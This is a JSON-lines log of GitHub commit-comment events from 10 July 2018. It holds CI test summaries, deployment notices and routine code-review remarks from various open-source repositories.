{"id":"7945047833","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29659834,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-10T16:41:58Z","updated_at":"2018-07-10T16:41:58Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2930 of 2931 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T16:41:58Z"}
{"id":"7945049474","type":"CommitCommentEvent","actor":{"login":"Siraj0708"},"repo":{"name":"Siraj0708/hello-world"},"payload":{"comment":{"id":29659843,"position":null,"line":null,"path":null,"commit_id":"b64d62c908d0439aafb6bbd520f4fa6e504ec577","created_at":"2018-07-10T16:42:16Z","updated_at":"2018-07-10T16:42:16Z","author_association":"OWNER","body":"xyz1"}},"created_at":"2018-07-10T16:42:16Z"}
{"id":"7945053482","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/bio_hansel"},"payload":{"comment":{"id":29659855,"position":15,"line":15,"path":"bio_hansel/scripts/find_cluster.py","commit_id":"9ec336263546c384d029c5ab5e17205de324f9e5","created_at":"2018-07-10T16:43:02Z","updated_at":"2018-07-10T16:43:02Z","author_association":"COLLABORATOR","body":"@gcttong It would be a good idea to split this function into a few smaller functions:\r\n\r\n- take a VCF dataframe and filter it for just the columns with the sample names and returning the filtered dataframe of binary SNV states (should be a numerical matrix of 1s and 0s) \r\n- take a binary SNV state dataframe/matrix and compute a distance matrix (pdist output)\r\n- take a distance matrix and output a hierarchical clustering linkage array (linkage output)\r\n- take a list of thresholds and a linkage array and output flat clusters in a dataframe\r\n\r\nIt should be easier to test each of these functions separately. "}},"created_at":"2018-07-10T16:43:02Z"}
{"id":"7945053733","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659856,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:43:06Z","updated_at":"2018-07-10T16:43:06Z","author_association":"CONTRIBUTOR","body":"`extern` stuff makes a lot of sense, I'll need to pay more attention to it from now on. Any idea how common would it be for the compiler *not* to eliminate the duplicate symbols? (e.g. perhaps you need special linker flags like sections + section GC? or does it work by default in most cases?)\r\n\r\nStringIDUtil is only used with the .cpp I believe."}},"created_at":"2018-07-10T16:43:06Z"}
{"id":"7945054869","type":"CommitCommentEvent","actor":{"login":"kjeyasot"},"repo":{"name":"s5irfan/cultureme-fydp"},"payload":{"comment":{"id":29659857,"position":null,"line":null,"path":null,"commit_id":"0579b038f7489b84928a25b7a7dc3665788d7b87","created_at":"2018-07-10T16:43:17Z","updated_at":"2018-07-10T16:43:17Z","author_association":"COLLABORATOR","body":"test comment"}},"created_at":"2018-07-10T16:43:17Z"}
{"id":"7945055078","type":"CommitCommentEvent","actor":{"login":"dude719"},"repo":{"name":"dude719/SigMaker-x64"},"payload":{"comment":{"id":29659858,"position":null,"line":null,"path":null,"commit_id":"65a84ce537280ebe48b4415427a82606bad1e0f4","created_at":"2018-07-10T16:43:19Z","updated_at":"2018-07-10T16:43:19Z","author_association":"OWNER","body":"It's because I had to re-merge the 0b86558 commit into the master branch since I already had commits to it before pushing."}},"created_at":"2018-07-10T16:43:19Z"}
{"id":"7945062445","type":"CommitCommentEvent","actor":{"login":"geeknoid"},"repo":{"name":"istio/istio.github.io"},"payload":{"comment":{"id":29659872,"position":null,"line":null,"path":null,"commit_id":"902ab5cdc01d71bea21000fed3089e607b91d042","created_at":"2018-07-10T16:44:41Z","updated_at":"2018-07-10T16:44:41Z","author_association":"CONTRIBUTOR","body":"The branch name will change shortly, doing so now breaks precommit checks though."}},"created_at":"2018-07-10T16:44:41Z"}
{"id":"7945070471","type":"CommitCommentEvent","actor":{"login":"jksf"},"repo":{"name":"EXCCoin/exccd"},"payload":{"comment":{"id":29659897,"position":14,"line":74,"path":"chaincfg/params.go","commit_id":"6b9dbac80cf9cc2014c57a91e8a79db0788d13eb","created_at":"2018-07-10T16:46:10Z","updated_at":"2018-07-10T16:46:10Z","author_association":"CONTRIBUTOR","body":"What about single core/thread PC? 0 (zero) miner threads won't work well."}},"created_at":"2018-07-10T16:46:10Z"}
{"id":"7945071173","type":"CommitCommentEvent","actor":{"login":"byron70"},"repo":{"name":"byron70/extension-flex"},"payload":{"comment":{"id":29659899,"position":null,"line":null,"path":null,"commit_id":"48147f36071788e826a8fa99c20937b0e5f3b6bb","created_at":"2018-07-10T16:46:17Z","updated_at":"2018-07-10T16:46:17Z","author_association":"OWNER","body":"The `Object amf` was a list looking like this: `[ASObject(123456){CustNumber=7890}]`.  The resultant object passed to the CFC as an `argumentCollection` was a list of structures. Where the CFC was expecting a numeric parameter.\r\n\r\nPerforming the list size check and object type check of the list in position 1, and then calling `toCFMLObject((ASObject)l.get(0))` results in the expected argumentCollection structure. \r\n\r\nAll of the Flash and CF code is currently working on ColdFusion 8, we are attempting to migrate to the latest Lucee version 5.2.7 and this is our stumbling block."}},"created_at":"2018-07-10T16:46:17Z"}
{"id":"7945075542","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29659906,"position":null,"line":null,"path":null,"commit_id":"c8e31d3ef373be131627a25f7a92413f9ad2d4ff","created_at":"2018-07-10T16:47:09Z","updated_at":"2018-07-10T16:47:09Z","author_association":"OWNER","body":"Made this enhancement #26 i don't see how anything would help."}},"created_at":"2018-07-10T16:47:09Z"}
{"id":"7945083045","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29659914,"position":null,"line":null,"path":null,"commit_id":"4946b312f5509a5cbd3ae6d0abb3620daf2e4f8a","created_at":"2018-07-10T16:48:33Z","updated_at":"2018-07-10T16:48:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-321](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-321).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-321-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T16:48:33Z"}
{"id":"7945084442","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659915,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:48:47Z","updated_at":"2018-07-10T16:48:47Z","author_association":"CONTRIBUTOR","body":"Before, it was there because `OldPkg.dir` needed to be found. Now it shouldn't be necessary. "}},"created_at":"2018-07-10T16:48:47Z"}
{"id":"7945090638","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29659926,"position":null,"line":null,"path":null,"commit_id":"d12890175cd61a6a5ceb2dbfad5a38fe90626b57","created_at":"2018-07-10T16:49:55Z","updated_at":"2018-07-10T16:49:55Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/jest-monorepo.319`__ :crossed_fingers: [`renovate/jest-monorepo`](https://github.com/streamich/ci-scripts/tree/renovate/jest-monorepo) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402294109) :tada:"}},"created_at":"2018-07-10T16:49:55Z"}
{"id":"7945093682","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29659934,"position":null,"line":null,"path":null,"commit_id":"f8255cc5df2210f40181d9ddc7a1dc9b127b901c","created_at":"2018-07-10T16:50:27Z","updated_at":"2018-07-10T16:50:27Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T16:50:27Z"}
{"id":"7945098270","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29659943,"position":null,"line":null,"path":null,"commit_id":"58677e9dee259690a34ec53bfa50831f8598ce8b","created_at":"2018-07-10T16:51:19Z","updated_at":"2018-07-10T16:51:19Z","author_association":"COLLABORATOR","body":"Ah yes; if moving a file, use `git mv` instead."}},"created_at":"2018-07-10T16:51:19Z"}
{"id":"7945114971","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29659966,"position":null,"line":null,"path":null,"commit_id":"59c1d775f3976c8b25d6ed38277acfd0899231b0","created_at":"2018-07-10T16:54:25Z","updated_at":"2018-07-10T16:54:25Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T16:54:25Z"}
{"id":"7945117023","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29659971,"position":null,"line":null,"path":null,"commit_id":"3032cd7170d5348cb480fdfbe161775a55a20a04","created_at":"2018-07-10T16:54:49Z","updated_at":"2018-07-10T16:54:49Z","author_association":"NONE","body":"@dmi3yy - I noticed 1.4.x does not use this file yet as not all commits have been copied from develop. The welcome is still generated from here: https://github.com/evolution-cms/evolution/blob/1.4.x/manager/actions/welcome.static.php willthe rest of the commits from develop be copied over?"}},"created_at":"2018-07-10T16:54:49Z"}
{"id":"7945127496","type":"CommitCommentEvent","actor":{"login":"owocki"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29659988,"position":5,"line":230,"path":"app/dashboard/router.py","commit_id":"054f16346f35a6229d4334979c7118b9348637ae","created_at":"2018-07-10T16:56:47Z","updated_at":"2018-07-10T16:56:47Z","author_association":"MEMBER","body":"yes. and/or fix the frontend so it never sets `order-by` to null."}},"created_at":"2018-07-10T16:56:47Z"}
{"id":"7945130441","type":"CommitCommentEvent","actor":{"login":"owocki"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29659994,"position":5,"line":230,"path":"app/dashboard/router.py","commit_id":"054f16346f35a6229d4334979c7118b9348637ae","created_at":"2018-07-10T16:57:21Z","updated_at":"2018-07-10T16:57:21Z","author_association":"MEMBER","body":"another (probably more maintainable) way to do this on the API layer would be to restrict order_by to be in the list of parameters that are associated with the object being sorted."}},"created_at":"2018-07-10T16:57:21Z"}
{"id":"7945133893","type":"CommitCommentEvent","actor":{"login":"StormNotes"},"repo":{"name":"StormNotes/portfolio"},"payload":{"comment":{"id":29660001,"position":null,"line":null,"path":null,"commit_id":"33026edd7c16c48212fd9bc6ef7af26f6d950ab5","created_at":"2018-07-10T16:58:01Z","updated_at":"2018-07-10T16:58:01Z","author_association":"OWNER","body":"nicc"}},"created_at":"2018-07-10T16:58:01Z"}
{"id":"7945133965","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/rsr_group"},"payload":{"comment":{"id":29660002,"position":14,"line":33,"path":"lib/rsr_group/catalog.rb","commit_id":"8a0c0c3d4f78fcbd033c521951249363a0f763cb","created_at":"2018-07-10T16:58:02Z","updated_at":"2018-07-10T16:58:02Z","author_association":"CONTRIBUTOR","body":"Could we try using `CSV::foreach` here?"}},"created_at":"2018-07-10T16:58:02Z"}
{"id":"7945135409","type":"CommitCommentEvent","actor":{"login":"StefanKarpinski"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29660006,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:58:19Z","updated_at":"2018-07-10T16:58:19Z","author_association":"MEMBER","body":"Ah, we should just delete all of the instances of `import OldPkg` then."}},"created_at":"2018-07-10T16:58:19Z"}
{"id":"7945136032","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29660008,"position":24,"line":56,"path":"main_vot.cpp","commit_id":"03f9700736da1f2aac42fe1b7bd2a0133f9ce90e","created_at":"2018-07-10T16:58:26Z","updated_at":"2018-07-10T16:58:26Z","author_association":"COLLABORATOR","body":"The variant with `x` doesn't work. I'm trying `./kcf_vot -f64x48 ...` and this still uses 64x64 patch size."}},"created_at":"2018-07-10T16:58:26Z"}
{"id":"7945138666","type":"CommitCommentEvent","actor":{"login":"barak"},"repo":{"name":"dottedmag/x2x"},"payload":{"comment":{"id":29660012,"position":null,"line":null,"path":null,"commit_id":"e62a535f9bace33c8b61ea9ff95f040622cb34a2","created_at":"2018-07-10T16:58:56Z","updated_at":"2018-07-10T16:58:56Z","author_association":"COLLABORATOR","body":"pushed"}},"created_at":"2018-07-10T16:58:56Z"}
{"id":"7945142464","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29660023,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:59:38Z","updated_at":"2018-07-10T16:59:38Z","author_association":"CONTRIBUTOR","body":"Yea, that seems to be enough"}},"created_at":"2018-07-10T16:59:38Z"}
{"id":"7945150362","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29660038,"position":null,"line":null,"path":null,"commit_id":"b3fed4bfdfa28dab41ee69798bedc8120acca397","created_at":"2018-07-10T17:01:06Z","updated_at":"2018-07-10T17:01:06Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T17:01:06Z"}
{"id":"7945153755","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29660041,"position":44,"line":219,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-10T17:01:43Z","updated_at":"2018-07-10T17:01:43Z","author_association":"COLLABORATOR","body":"I'm a little confused as to why we're using goto+label in compiling function definitions. Earlier when you talked about using goto+label as being equivalent to let/ec, you characterized it as a technique for inlining functions. But I believe the last time we spoke, you instructed to me to compile function definitions as real C functions with arguments and a return statement. I'm probably misunderstanding you, but it seems like there's a mismatch between the information provided in the `Fun` definition (which expects some variable name to assign the return value and label to jump to) and the implementation that I've been writing."}},"created_at":"2018-07-10T17:01:43Z"}
{"id":"7945156536","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29660045,"position":10,"line":9,"path":"app/src/main/res/layout/fragment_main.xml","commit_id":"b2ef4f3645d2168a0d60e384c7d59fa093985bb6","created_at":"2018-07-10T17:02:16Z","updated_at":"2018-07-10T17:02:16Z","author_association":"OWNER","body":"ใช้ List view"}},"created_at":"2018-07-10T17:02:16Z"}
{"id":"7945159008","type":"CommitCommentEvent","actor":{"login":"maximbaz"},"repo":{"name":"ultrabug/py3status"},"payload":{"comment":{"id":29660049,"position":null,"line":null,"path":null,"commit_id":"e3a189b03e81bf446ef37e424ad3ea7a11a92c2a","created_at":"2018-07-10T17:02:44Z","updated_at":"2018-07-10T17:02:44Z","author_association":"CONTRIBUTOR","body":"@ultrabug & @tobes, given how much value @lasers has already brought to py3status, I think you should really consider giving him permanent collaborator permissions and letting him cleanup the PRs backlog. It feels sad seeing the amount of open issues and PRs, and @lasers since has time and energy to actively maintain the project, I believe we should give him the opportunity.\r\n\r\nThis is a responsibility, but I think @lasers can handle it, he is already familiar with all the concepts and style guides used in py3status. \r\n\r\nFinally, I simply prefer using projects with active development and frequent updates. Even if you (or anyone) spot an issue in a PR that was merged a week ago, it's very easy to improve upon it in a new PR, or in a worst case revert the offending commit, and release a new version."}},"created_at":"2018-07-10T17:02:44Z"}
{"id":"7945160824","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29660053,"position":16,"line":20,"path":"app/src/main/java/com/nestliveat500px/liveat500px/fragment/MainFragment.java","commit_id":"b2ef4f3645d2168a0d60e384c7d59fa093985bb6","created_at":"2018-07-10T17:03:06Z","updated_at":"2018-07-10T17:03:06Z","author_association":"OWNER","body":"Custom View group ที่สร้างเอง คล้ายๆ viewHolder"}},"created_at":"2018-07-10T17:03:06Z"}
{"id":"7945161174","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29660056,"position":null,"line":null,"path":null,"commit_id":"d76188d52b044185d346b2227e4b4cfd0d7f8f27","created_at":"2018-07-10T17:03:10Z","updated_at":"2018-07-10T17:03:10Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-20](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-20).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-20-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-10T17:03:10Z"}
{"id":"7945162988","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660059,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T17:03:31Z","updated_at":"2018-07-10T17:03:31Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2785 of 2932 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 148 tests had: EIO diffs.\n * 145 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 3 tests had: MTR small diffs.\n * 18 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\nregression Test Summary\n * Passed: 477\n * Failed: 146\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T17:03:31Z"}
{"id":"7945163774","type":"CommitCommentEvent","actor":{"login":"dmi3yy"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29660061,"position":null,"line":null,"path":null,"commit_id":"3032cd7170d5348cb480fdfbe161775a55a20a04","created_at":"2018-07-10T17:03:40Z","updated_at":"2018-07-10T17:03:40Z","author_association":"NONE","body":"I merge commits from develop to 1.4.x but now need test and fix if found any bugs. \r\n\r\n"}},"created_at":"2018-07-10T17:03:40Z"}
{"id":"7945168845","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29660070,"position":52,"line":52,"path":"app/src/main/java/com/nestliveat500px/liveat500px/adapter/PhotoListAdapter.java","commit_id":"b2ef4f3645d2168a0d60e384c7d59fa093985bb6","created_at":"2018-07-10T17:04:41Z","updated_at":"2018-07-10T17:04:41Z","author_association":"OWNER","body":"บอก adapter ว่ามี view 2 ประเภทนะ"}},"created_at":"2018-07-10T17:04:41Z"}
{"id":"7945169661","type":"CommitCommentEvent","actor":{"login":"dmi3yy"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29660072,"position":null,"line":null,"path":null,"commit_id":"3032cd7170d5348cb480fdfbe161775a55a20a04","created_at":"2018-07-10T17:04:51Z","updated_at":"2018-07-10T17:04:51Z","author_association":"NONE","body":"i think i copied all from develop, search all  from 1.4.4 release to yesterday  \r\n\r\nbut maybe some missing :( "}},"created_at":"2018-07-10T17:04:51Z"}
{"id":"7945172126","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29660078,"position":58,"line":58,"path":"app/src/main/java/com/nestliveat500px/liveat500px/adapter/PhotoListAdapter.java","commit_id":"b2ef4f3645d2168a0d60e384c7d59fa093985bb6","created_at":"2018-07-10T17:05:20Z","updated_at":"2018-07-10T17:05:20Z","author_association":"OWNER","body":"ต่ำแหน่งคู่ คือ 0 ที่เหลือ คือ 1"}},"created_at":"2018-07-10T17:05:20Z"}
{"id":"7945172979","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"martins-mozeiko/rosidl_python"},"payload":{"comment":{"id":29660082,"position":4,"line":19,"path":"rosidl_generator_py/resource/_msg_pkg_typesupport_entry_point.c.em","commit_id":"f4edf57ed8bfd9fb3a68c5edf9e5644bfa697c80","created_at":"2018-07-10T17:05:30Z","updated_at":"2018-07-10T17:05:30Z","author_association":"NONE","body":"Please move this line one up to keep the includes in alphabetical order."}},"created_at":"2018-07-10T17:05:30Z"}
{"id":"7945173149","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"martins-mozeiko/rosidl_python"},"payload":{"comment":{"id":29660083,"position":21,"line":84,"path":"rosidl_generator_py/resource/_msg_pkg_typesupport_entry_point.c.em","commit_id":"f4edf57ed8bfd9fb3a68c5edf9e5644bfa697c80","created_at":"2018-07-10T17:05:32Z","updated_at":"2018-07-10T17:05:32Z","author_association":"NONE","body":"Please insert the new name after `convert_from_py` since that matches the order to of calling them better."}},"created_at":"2018-07-10T17:05:32Z"}
{"id":"7945173365","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/plain-credentials-plugin"},"payload":{"comment":{"id":29660084,"position":null,"line":null,"path":null,"commit_id":"d10198cbbd37f9b6eca28f505e32ca2c911f9f4b","created_at":"2018-07-10T17:05:34Z","updated_at":"2018-07-10T17:05:34Z","author_association":"MEMBER","body":"cf. #7"}},"created_at":"2018-07-10T17:05:34Z"}
{"id":"7945173629","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"martins-mozeiko/rosidl_python"},"payload":{"comment":{"id":29660085,"position":73,"line":127,"path":"rosidl_generator_py/resource/_msg_support.c.em","commit_id":"f4edf57ed8bfd9fb3a68c5edf9e5644bfa697c80","created_at":"2018-07-10T17:05:38Z","updated_at":"2018-07-10T17:05:38Z","author_association":"NONE","body":"Please append `internal_` to this variable name."}},"created_at":"2018-07-10T17:05:38Z"}
{"id":"7945174767","type":"CommitCommentEvent","actor":{"login":"wongma7"},"repo":{"name":"mkimuram/external-provisioner"},"payload":{"comment":{"id":29660087,"position":124,"line":871,"path":"pkg/controller/controller_test.go","commit_id":"b754326474bc63d85a2466f936331c90d6b833b3","created_at":"2018-07-10T17:05:52Z","updated_at":"2018-07-10T17:05:52Z","author_association":"NONE","body":"IMO the provisioner shouldn't set FSType when it's block, I guess https://github.com/kubernetes-csi/external-provisioner/blob/bc0b6718292ab0cd76697d997059f060e3228afb/pkg/controller/controller.go#L389 should be changed. https://github.com/kubernetes/kubernetes/pull/65705 will be doing the same for upstream"}},"created_at":"2018-07-10T17:05:52Z"}
{"id":"7945175537","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29660088,"position":47,"line":47,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/EditionsViewHolder.kt","commit_id":"f46c2efbd64d81d9a6459b641355f5a9396399c0","created_at":"2018-07-10T17:06:00Z","updated_at":"2018-07-10T17:06:00Z","author_association":"MEMBER","body":"Ты прав :)"}},"created_at":"2018-07-10T17:06:00Z"}
{"id":"7945181893","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29660105,"position":28,"line":72,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/FontTextView.kt","commit_id":"3a145fd0259d058bbfc94b9be04dcd9553a9f387","created_at":"2018-07-10T17:07:15Z","updated_at":"2018-07-10T17:07:15Z","author_association":"MEMBER","body":"Как вариант. Можно и так оставить"}},"created_at":"2018-07-10T17:07:15Z"}
{"id":"7945181976","type":"CommitCommentEvent","actor":{"login":"keyurp1987"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29660106,"position":null,"line":null,"path":null,"commit_id":"2f181b3f41487c0c2c4459e3dfb5a9e3d256eccb","created_at":"2018-07-10T17:07:16Z","updated_at":"2018-07-10T17:07:16Z","author_association":"NONE","body":"@ilovezfs Thanks for the quick fix. Yes I will create the issue to get the attention in future. "}},"created_at":"2018-07-10T17:07:16Z"}
{"id":"7945182996","type":"CommitCommentEvent","actor":{"login":"uojiakux"},"repo":{"name":"uojiakux/uojiakux.github.io"},"payload":{"comment":{"id":29660109,"position":null,"line":null,"path":null,"commit_id":"959b945e9d812aedfa7aa80a0670e27cc629550b","created_at":"2018-07-10T17:07:29Z","updated_at":"2018-07-10T17:07:29Z","author_association":"OWNER","body":"I uploaded this file because I thought it did not get uploaded with the previous commit, but I guess I was was wrong"}},"created_at":"2018-07-10T17:07:29Z"}
{"id":"7945183128","type":"CommitCommentEvent","actor":{"login":"viacoffee"},"repo":{"name":"ammoready/rsr_group"},"payload":{"comment":{"id":29660110,"position":14,"line":33,"path":"lib/rsr_group/catalog.rb","commit_id":"8a0c0c3d4f78fcbd033c521951249363a0f763cb","created_at":"2018-07-10T17:07:30Z","updated_at":"2018-07-10T17:07:30Z","author_association":"CONTRIBUTOR","body":"I don't see why not"}},"created_at":"2018-07-10T17:07:30Z"}
{"id":"7945183366","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29660111,"position":44,"line":219,"path":"compile.rkt","commit_id":"9d4c0091c8107e6e92e2e7efb9a0e8a6b17f19e0","created_at":"2018-07-10T17:07:33Z","updated_at":"2018-07-10T17:07:33Z","author_association":"OWNER","body":"You could compile `(Goto return-lab)` into `return ,ret-x;` but doing so would require special handling of this specific kind of label. The compiler will be simpler and more uniform if `(Goto lab)` is always `goto lab;` but that means that we need to synthesize a label in the Fun call. My comment before suggests that maybe we should just remove `return-lab` from Funs all togethers, because we can get it via a \"macro\""}},"created_at":"2018-07-10T17:07:33Z"}
{"id":"7945184292","type":"CommitCommentEvent","actor":{"login":"nestjs57"},"repo":{"name":"nestjs57/LiveAt500px"},"payload":{"comment":{"id":29660112,"position":null,"line":null,"path":null,"commit_id":"b2ef4f3645d2168a0d60e384c7d59fa093985bb6","created_at":"2018-07-10T17:07:43Z","updated_at":"2018-07-10T17:07:43Z","author_association":"OWNER","body":"ไม่ควรใช้ ViewHolder เพราะจะทำให้ code บวม ใช้แบบนี้ดีที่สุด คือการสร้าง CustomViewGroup แล้วเรียกใช้ใน Adapter เลย"}},"created_at":"2018-07-10T17:07:43Z"}
